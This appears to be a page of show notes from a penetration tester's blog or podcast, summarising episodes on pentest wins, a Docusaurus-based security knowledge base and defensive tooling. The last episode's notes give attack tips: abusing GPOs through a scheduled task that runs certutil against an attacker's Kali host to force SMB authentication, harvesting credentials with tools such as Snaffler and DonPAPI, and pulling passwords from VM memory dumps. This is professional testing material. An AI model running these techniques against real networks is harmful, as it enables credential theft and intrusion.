Today’s tale of pentest pwnage talks about the dark powers of the net.py script from impacket.

Today we’re talking pentesting – specifically some mini gems that can help you escalate local/domain/SQL privileges:

• Check the C: drive! If you get local admin and the system itself looks boring, check root of C – might have some interesting scripts or folders with tools that have creds in them.
• Also look at Look at Get-ScheduledTasks
• Find ids and passwords easily in Snaffler output with this Snaffler cleaner script
• There’s a ton of gold to (potentially) be found in SQL servers – check out my notes on using PowerUpSQL to find misconfigs and agent jobs you might able to abuse!

Hello friends, I’m excited to release BPATTY[RELOADED] into the world at https://bpatty.rocks! – which stands for Brian’s Pentesting and Technical Tips for You! It’s a knowledge base of IT and security bits that help me do a better job doing security stuff! Today I do an ACTUAL 7-minute episode (GASP…what a concept!) covering my favorite bits on the site so far. Enjoy!

Artificial hype alert! I’m working on a NEW version of BPATTY (Brian’s Pentesting and Technical Tips for You), but it is delayed because of a weird domain name hostage negotiation situation. It’s weird. But in the meantime I want to talk about the project (which is a pentest documentation library built on Docusaurus) and how I think it will be bigger/better/stronger/faster/cooler than BPATTY v1 (which is now in archive/read-only mode).

Today we’re talking about eating the security dog food – specifically:

• Satisfying critical security control #1
• Using the Atlassian family of tools to create a ticketing/change control system and wrap it into an asset inventory
• Leveraging Wazuh as a security monitoring system (with eventual plans to leverage its API to feed Atlassian inventory data)

Hi, today’s tale of pentest pwnage covers a few wins and one loss:

1. A cool opportunity to drop Farmer “crops” to a domain admin’s desktop folder via PowerShell remote session
2. Finding super sensitive data by dumpster-diving into a stale C:\Users\Domain-Admin profile
3. Finding a vCenter database backup and being unable to pwn it using vcenter_saml_login

Hey friends, we’re doing a little departure from our normal topics and focusing on how to create a security knowledgebase (is that one word or two?) using Docusaurus! It’s cool, it’s free, it’s from Meta and you can get up and going in just a few commands – check out their getting started guide to get rockin’ in about 5 minutes. Important files include:

• docusaurus.config.js – for setting the site title and key config settings
• sidebars.js – used to create/edit navigation bar menus
• /src/css/custom.css – to style the site

Today’s tale of pentest pwnage includes some fun stuff, including:

• • SharpGPOAbuse helps abuse vulnerable GPOs! Try submitting a harmless POC first via a scheduled task – like ping -n 1 your.kali.ip.address. When you’re ready to fire off a task that coerces SMB auth, try certutil -syncwithWU \\your.kali.ip.address\arbitrary-folder.
  • I’m not 100% sure on this, but I think scheduled tasks capture Kerberos tickets temporarily to workstation(s). If you’re on a compromised machine, try Get-ScheduledTask -taskname "name" | select * to get information about what context the attack is running under.
  • DonPAPI got an upgrade recently with a focus on evasion!
  • When attacking vCenter (see our past YouTube stream for a walkthrough), make sure you’ve got the vmss2core utility, which I couldn’t find anywhere except the Internet Archive. Then I really like to follow this article to pull passwords from VM memory dumps.
  • Can’t RDP into a victim system that you’re PSRemote’d into? Maybe RDP is listening on an alternate port! Try Get-ItemProperty -path "HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp | select-object portnumber`

And if you want to hang around until the very end, you can hear me brag about my oldest son who just became an EMT!